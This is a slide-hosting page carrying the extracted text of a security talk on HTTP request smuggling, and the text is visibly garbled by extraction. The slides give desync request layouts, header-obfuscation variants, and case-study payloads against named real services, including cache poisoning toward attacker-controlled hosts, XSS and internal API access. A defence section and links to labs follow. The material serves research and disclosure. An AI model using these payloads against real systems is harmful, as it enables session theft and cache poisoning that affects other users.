http tp desync attacks
play

HTTP TP DESYNC ATTACKS SM SMASH SHING INTO THE CE CELL NEXT DOOR - PowerPoint PPT Presentation

Mar 09, 2024 •454 likes •783 views

HTTP TP DESYNC ATTACKS SM SMASH SHING INTO THE CE CELL NEXT DOOR James Kettle Th The Fear ar Th Theor ory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005

  1. HTTP TP DESYNC ATTACKS SM SMASH SHING INTO THE CE CELL NEXT DOOR James Kettle

  2. Th The Fear ar Th Theor ory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 "You will not earn bounties" "You will certainly not be considered like a white hat"

  3. Ou Outline • Theory & Methodology • Exploitation Case Studies • Defence • Q&A

  4. HT HTTP/1. 1.1 1 keep eep-aliv alive HTTP over TLS/TCP

  5. HT HTTP/1. 1.1 1 keep eep-alive, desynch chronized

  6. Desynch chronizing: the cl classic c approach ch POST / HTTP/1.1 Host: example.com Content-Length: 6 Front-end sees this Back-end sees this Content-Length: 5 POST / HTTP/1.1 12345G Host: example.com … Unknown method GPOST

  7. Desynch chronizing: the ch chunked approach ch POST / HTTP/1.1 Host: example.com Content-Length: 6 Front-end sees this Transfer-Encoding: chunked Back-end sees this 0 GPOST / HTTP/1.1 … Unknown method GPOST

  8. Desynch chronizing: the TE.CL approach ch POST / HTTP/1.1 Host: example.com Content-Length: 3 Back-end sees this Front-end sees this Transfer-Encoding: chunked 6 \r\n PREFIX 0 POST / HTTP/1.1 Host: example.com

  9. Forci cing desync If a message is received with both a Transfer-Encoding header field and a Content- Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3 Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 123 Transfer-Encoding: x Transfer-Encoding : chunked Transfer-Encoding: xchunked Transfer-Encoding:[tab]chunked GET / HTTP/1.1 Transfer-Encoding: chunked X: X[\n]Transfer-Encoding: chunked Transfer-Encoding : chunked

  10. Me Metho thodo dology

  11. Detect cting desync POST /about HTTP/1.1 POST /about HTTP/1.1 Host: example.com Host: example.com Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 6 Content-Length: 6 3 0 abc X Q CL.CL: backend response CL.CL: backend response TE.TE: frontend response TE.TE: backend response TE.CL: frontend response TE.CL: timeout CL.TE: timeout CL.TE: socket poison

  12. Confirmi Co ming g des esyn ync POST /search HTTP/1.1 POST /search HTTP/1.1 Content-Length: 51 Content-Length: 4 Transfer-Encoding: zchunked Transfer-Encoding: zchunked 11 96 =x&q=smuggling&x= GET /404 HTTP/1.1 0 X: X=1&q=smugging&x= Host: example.com GET /404 HTTP/1.1 Content-Length: 100 POST /search HTTP/1.1 X: X Host: example.com x= … 0 POST /search HTTP/1.1 Triggers 404 if vulnerable Host: example.com

  13. CASE STUDIES

  14. By Bypassing rules POST / HTTP/1.1 Host: software-vendor.com Content-Length: 200 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: software-vendor.com HTTP/1.1 200 OK X: X GET / HTTP/1.1 Host: software-vendor.com Please log in

  15. By Bypassing rewrite tes POST / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 Content-Length: 200 Transfer-Encoding : chunked 0 GET / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 xyz.burpcollaborator.net X: X GET… $ 300

  16. Request reflect ction Please ensure that your email and POST / HTTP/1.1 password are correct. Host: login.newrelic.com <input id="email" value="asdfPOST Content-Length: 142 /login HTTP/1.1 Transfer-Encoding: chunked Host: login.newrelic.com Transfer-Encoding: x X-Forwarded-For: 81.139.39.150 X-Forwarded-Proto: https 0 X-TLS-Bits: 128 X-TLS-Cipher: ECDHE-RSA-AES128… POST /login HTTP/1.1 x-nr-external-service: external Host: login.newrelic.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 … login[pass]=1234&login[email]=asdf POST /login HTTP/1.1 Host: login.newrelic.com

  17. Ex Exploring GET / HTTP/1.1 HTTP/1.1 301 Moved Permanently Host: staging-alerts.newrelic.com Location: https://staging-alerts.newrelic.com/ GET / HTTP/1.1 HTTP/1.1 404 Not Found Host: staging-alerts.newrelic.com X-Forwarded-Proto: https Action Controller: Exception caught GET /revision_check HTTP/1.1 HTTP/1.1 200 OK Host: staging-alerts.newrelic.com X-Forwarded-Proto: https Not authorized with header: GET /revision_check HTTP/1.1 HTTP/1.1 403 Forbidden Host: staging-alerts.newrelic.com X-Forwarded-Proto: https Forbidden X-nr-external-service: 1

  18. Ex Exploring POST /login HTTP/1.1 HTTP/1.1 200 OK Host: login.newrelic.com Content-Length: 564 { "user": { Transfer-Encoding: chunked "account_id": 934454, Transfer-encoding: cow "is_newrelic_admin": true 0 }, "current_account_id": 934454 POST /internal_api/934454/session HTTP/1.1 … Host: alerts.newrelic.com } X-Forwarded-Proto: https Service-Gateway-Account-Id: 934454 Service-Gateway-Is-Newrelic-Admin: true Content-Length: 6 … GET … x=123 +$3,000 =$3,300

  19. In Involuntary y req eques est storage POST /1/cards HTTP/1.1 Host: trello.com Transfer-Encoding:[tab]chunked Content-Length: 4 9f PUT /1/members/1234 HTTP/1.1 Host: trello.com Content-Type: application/x-www-form-urlencoded Content-Length: 400 x=x&csrf=1234&username=testzzz&bio=cake 0 +$1,800 GET / HTTP/1.1 +$2,500 Host: trello.com =$7,600

  20. Ha Harmful res esponses es POST / HTTP/1.1 HTTP/1.1 200 OK Host: saas-app.com … Content-Length: 4 <input name="SAML" Transfer-Encoding : chunked value="a"><script>alert(1) </script> 10 =x&csrf=token&x= 0 66 POST /index.php HTTP/1.1 POST / HTTP/1.1 Host: saas-app.com Host: saas-app.com Content-Length: 100 Cookie: … SAML=a"><script>alert(1)</script> "/> 0 POST / HTTP/1.1 Host: saas-app.com +$2,000 Cookie: … =$9,600

  21. Acci ccidental Cach che Poisoning POST / HTTP/1.1 Frontend perspective Host: redacted.com Content-Length: 45 GET /images/x.png HTTP/1.1 Transfer-Encoding: chunked 0 HTTP/1.1 301 Moved Permanently Location: https://52.16.21.24/ POST / HTTP/1.1 Host: 52.16.21.24 X: X GET /images/x.png HTTP/1.1

  22. Web Cach che Dece ception++ Front-end perspective POST / HTTP/1.1 Transfer-Encoding: blah GET /static/site.js HTTP/1.1 0 HTTP/1.1 200 OK GET /user/apikey HTTP/1.1 X: X GET /static/site.js HTTP/1.1 Your API key Cookie: sessionid=xyz … Expected habitat: Sensitive responses with fixed, uncached extensions Sensitive POST responses

  23. CDN CDN Ch Chaining POST /cow.jpg HTTP/1.1 Host: redacted.com Content-Type: application/x-www-form-urlencoded Content-Length: 50 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Host: www.redhat.com X: X GET… Red Hat - We make open source technologies for the enterprise

  24. Ch Chaining g DO DOM Problems ems GET /assets/idx?redir=//redhat.com@evil.net/ HTTP/1.1 Runs on unknown Host: www.redhat.com URL in victim's browser <script> var destination = getQueryParam('redir') [low quality filtering] document.location = destination </script> POST /en/search?dest=../assets/idx?redir=… HTTP/1.1 Solution: chain a Host: www.redhat.com server-side local redirect HTTP/1.1 301 Found Location: /assets/idx?redir=//redhat.co…

  25. Redirect cts with teeth POST /etc/libs/xyz.js HTTP/1.1 Host: redacted.com Content-Length: 57 Transfer-Encoding: chunked 0 POST /etc HTTP/1.1 +$550 Host: burpcollaborator.net +$750 X: X GET /etc/libs/xyz.js HTTP/1.1 +$1,000 … +$2,000 +$5,000 HTTP/1.1 301 Moved Permanently +$10,500 Location: https://burpcollaborator.net/etc/ =$27,400

  26. Web Cach che Poisoning POST /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Content-Length: 61 Transfer-Encoding: chunked 0 GET /webstatic HTTP/1.1 ? Host: skeletonscribe.net X: XGET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Connection: close HTTP/1.1 302 Found Location: http://skeletonscribe.net , c.paypal.com/webstatic/ ?

  27. Pa PayPa Pal Po Poisoning +$18,900 =$46,300

  28. Wr Wrapped exploits HTTP/1.1 403 Forbidden GET / HTTP/1.1 Server: AkamaiGHost Host: c.paypal.com Content-Length: 5 <HTML><HEAD> Transfer-Encoding: chunked <TITLE>Access Denied</TITLE> 0 </HEAD> GET / HTTP/1.1 HTTP/1.1 200 OK Host: c.paypal.com … Content-Length: 5 Transfer-Encoding: chunked 0 +$20,000 =$66,300

  29. DEMO -bugzilla- +$4,500 =$70,800

  30. Defence ce Attack Tooling • Support manual/invalid content-length • Don't normalize requests • Test environment must match prod Safety • Frontend: Normalize ambiguous requests – RFC 7230 • Frontend: Use HTTP/2 to talk to backend • Backend: Drop request & connection

  31. Fu Furth ther er rea eading Whitepaper https://portswigger.net/blog/http-desync-attacks Online labs https://portswigger.net/web-security/request-smuggling Burp Suite Extension https://github.com/portswigger/http-request-smuggler References http://cgisecurity.com/lib/HTTP-Request-Smuggling.pdf DEF CON 24 – regilero - Hiding Wookiees in HTTP

  32. Ta Takeaways • HTTP Request Smuggling is real • HTTP/1.1 parsing is security critical • Detection doesn't have to be dangerous @albinowax Email: james.kettle@portswigger.net

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Mark Shtern DDoS Attacks http://en.wikipedia.org/wiki/Operation_Pa yback

Mark Shtern DDoS Attacks http://en.wikipedia.org/wiki/Operation_Pa yback

Mark Shtern DDoS Attacks http://en.wikipedia.org/wiki/Operation_Pa yback http://www.betterhostreview.com/wp-content/uploads/2013/08/ddos-attack.gif 2 DDoS Attacks http://blog.rivalhost.com/wp- http://en.wikipedia.org/wiki/Low

800 views • 36 slides
Website fingerprinting attacks against Tor Browser Bundle: a comparison between HTTP/1.1 and

Website fingerprinting attacks against Tor Browser Bundle: a comparison between HTTP/1.1 and

Tor website fingerprinting Website fingerprinting attacks against Tor Browser Bundle: a comparison between HTTP/1.1 and HTTP/2 T.T.N. Marks BSc. K.C.N. Halvemaan BSc. University of Amsterdam System and Network Engineering Research Project #1

664 views • 32 slides
More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html

More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html

More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao- exploit/ https://hackernoon.com/what-caused-the-latest-100-million-

853 views • 36 slides
Cache-timing attacks http://cr.yp.to/papers.html #cachetiming , 2005: D. J. Bernstein This

Cache-timing attacks http://cr.yp.to/papers.html #cachetiming , 2005: D. J. Bernstein This

Cache-timing attacks http://cr.yp.to/papers.html #cachetiming , 2005: D. J. Bernstein This paper reports successful Thanks to: extraction of a complete AES key University of Illinois at Chicago from a network server NSF CCR9983950 on

1.28k views • 91 slides
http://www.cl.cam.ac.uk/~mgk25/sc99-tamper[-slides].pdf Classes of Attacks on Security Modules

http://www.cl.cam.ac.uk/~mgk25/sc99-tamper[-slides].pdf Classes of Attacks on Security Modules

Design Principles for Tamper-Resistant Smartcard Processors Oliver Kmmerling Markus G. Kuhn ADSR Computer Laboratory http://www.cl.cam.ac.uk/~mgk25/sc99-tamper[-slides].pdf Classes of Attacks on Security Modules Microprobing Open the

465 views • 22 slides
NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

CMPS122: COMPUTER SECURITY NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3 due tonight NETWORKING ATTACKS LAST TIME TCP/IP networking stack Physical layer Data link layer Network

1.1k views • 61 slides
Transcript Collision Attacks: Breaking Authentication in TLS, IKE and SSH or: MD5 MUST DIE

Transcript Collision Attacks: Breaking Authentication in TLS, IKE and SSH or: MD5 MUST DIE

Transcript Collision Attacks: Breaking Authentication in TLS, IKE and SSH or: MD5 MUST DIE http://sloth-attack.org Karthikeyan Bhargavan Gatan Leurent Crypto protocols and applications evolve Agility: graceful transition from old to new

228 views • 18 slides
Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22 Overview What is a stream cipher? Classification of attacks Different Attacks Exhaustive Key Search Time Memory Tradeoffs

656 views • 22 slides
Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to penetrate a network by using wireless or evading WLAN access control measures, like AP MAC filters and 802.1X port access controls. Type of Attack

184 views • 7 slides
Computer Security http://security.di.unimi.it/sicurezza1819/ Chapter 3: 1 Chapter 17: Network

Computer Security http://security.di.unimi.it/sicurezza1819/ Chapter 3: 1 Chapter 17: Network

Computer Security http://security.di.unimi.it/sicurezza1819/ Chapter 3: 1 Chapter 17: Network Security Chapter 17: 2 Agenda Net adversary TCP attacks DNS attacks Firewalls Intrusion detection Honeypots Chapter 17: 3

792 views • 62 slides
Defeating Relay Attacks in NFC Payments Serge Vaudenay COLE POLYTECHNIQUE FDRALE DE

Defeating Relay Attacks in NFC Payments Serge Vaudenay COLE POLYTECHNIQUE FDRALE DE

Defeating Relay Attacks in NFC Payments Serge Vaudenay COLE POLYTECHNIQUE FDRALE DE LAUSANNE http://lasec.epfl.ch/ SV 2014 distance-bounding SDTA 14 1 / 42 Relay Attacks 1 Distance-Bounding Protocols 2 3 Asymmetric DB Protocols

1.02k views • 42 slides
Downgrade Attacks by Example How Compatibility breaks Security Michael Rodler (@f0rki)

Downgrade Attacks by Example How Compatibility breaks Security Michael Rodler (@f0rki)

Downgrade Attacks by Example How Compatibility breaks Security Michael Rodler (@f0rki) 2012-01-21 Michael Rodler Downgrade Attacks 1 / 39 About me about me @f0rki, http://f0rki.at Student Sichere Informationssysteme Bachelor at

820 views • 51 slides
Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka Savola Introduction Describes a view of ISP backbone network attacks Lots of folks in IETF and elsewhere had quite different ideas whats out

529 views • 9 slides
Scanning Applications 2.0 Next generation scan, attacks and tools Shreeraj Shah Washington DC

Scanning Applications 2.0 Next generation scan, attacks and tools Shreeraj Shah Washington DC

Scanning Applications 2.0 Next generation scan, attacks and tools Shreeraj Shah Washington DC 20 th Feb 2008 http: / / shreeraj.blogspot.com Who Am I? http: / / shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http: / /

1.6k views • 94 slides
Four False Stories on Twitter 1. Fake Attacks 2. Fake Attacks Satire 3. Fake Scenes 4.

Four False Stories on Twitter 1. Fake Attacks 2. Fake Attacks Satire 3. Fake Scenes 4.

CASOS Exploring False Story Dynamics in the Black Panther Twitter Conversation Ramon Villa-Cox rvillaco@andrew.cmu.edu Center for Computational Analysis of Social and Organizational Systems http://www.casos.cs.cmu.edu/ Event: Black Panther

265 views • 13 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
CSE543 - Introduction to Computer and Network Security Module: Network Security Professor

CSE543 - Introduction to Computer and Network Security Module: Network Security Professor

936 views • 70 slides
Dynamic Near Data Processing Framework for SSDs Gunjae Koo *, Kiran Kumar Matam*, Te I ,

Dynamic Near Data Processing Framework for SSDs Gunjae Koo *, Kiran Kumar Matam*, Te I ,

Dynamic Near Data Processing Framework for SSDs Gunjae Koo *, Kiran Kumar Matam*, Te I , H.V. KrishinaGiri Nara*, Jing Li , Hung-Wei Tseng , Steven Swanson , Murali Annavaram* *University of Southern California North

853 views • 35 slides
TC-CIM: Empowering Tensor Comprehensions for Computing In Memory Andi Drebes 1 Lorenzo Chelini 2,3

TC-CIM: Empowering Tensor Comprehensions for Computing In Memory Andi Drebes 1 Lorenzo Chelini 2,3

TC-CIM: Empowering Tensor Comprehensions for Computing In Memory Andi Drebes 1 Lorenzo Chelini 2,3 Oleksandr Zinenko 4 Albert Cohen 4 Henk Corporaal 2 Tobias Grosser 5 Kanishkan Vadivel 2 Nicolas Vasilache 4 1 Inria and erieure 2 TU Eindhoven 3

599 views • 41 slides
Golden Gate Bridging The Resource-Efficiency Gap Between ASICs and FPGA Prototypes Albert Magyar

Golden Gate Bridging The Resource-Efficiency Gap Between ASICs and FPGA Prototypes Albert Magyar

Golden Gate Bridging The Resource-Efficiency Gap Between ASICs and FPGA Prototypes Albert Magyar , David Biancolin, Jack Koenig, Sanjit Seshia, Jonathan Bachrach, Krste Asanovi Two major challenges of FPGA simulation FireSim

621 views • 37 slides
Introduction to Virtual Machines Introduction Abstraction and interfaces Virtualization

Introduction to Virtual Machines Introduction Abstraction and interfaces Virtualization

Introduction to Virtual Machines Introduction Abstraction and interfaces Virtualization Computer system architecture Process virtual machines System virtual machines 1 EECS 768 Virtual Machines Abstraction Mechanism to

704 views • 31 slides
1 Welcome to our e-module on Post-Award Orientation Conferences in our series on How to

1 Welcome to our e-module on Post-Award Orientation Conferences in our series on How to

Welcome to our e-module on Post-Award Orientation Conferences in our series on How to Work with USAID. This module is provided to give you best practices and guidance on the post-award process, and specifically on preparing for a

778 views • 29 slides
Security I retired slides Markus Kuhn Computer Laboratory Lent 2013 Part I B

Security I retired slides Markus Kuhn Computer Laboratory Lent 2013 Part I B

Security I retired slides Markus Kuhn Computer Laboratory Lent 2013 Part I B http://www.cl.cam.ac.uk/teaching/1213/SecurityI/ 1 TEA, a Tiny Encryption Algorithm TEA is a 64-bit block cipher with 128-bit key and 64-round Feistel

218 views • 19 slides
Naming DNS &amp; DHCP Naming IP addresses allow global connectivity But theyre pretty

Naming DNS &amp; DHCP Naming IP addresses allow global connectivity But theyre pretty

This time Digging into Networking Protocols Naming DNS &amp; DHCP Naming IP addresses allow global connectivity But theyre pretty useless for humans! Cant be expected to pick their own IP address Cant be expected to

1.05k views • 80 slides

More recommend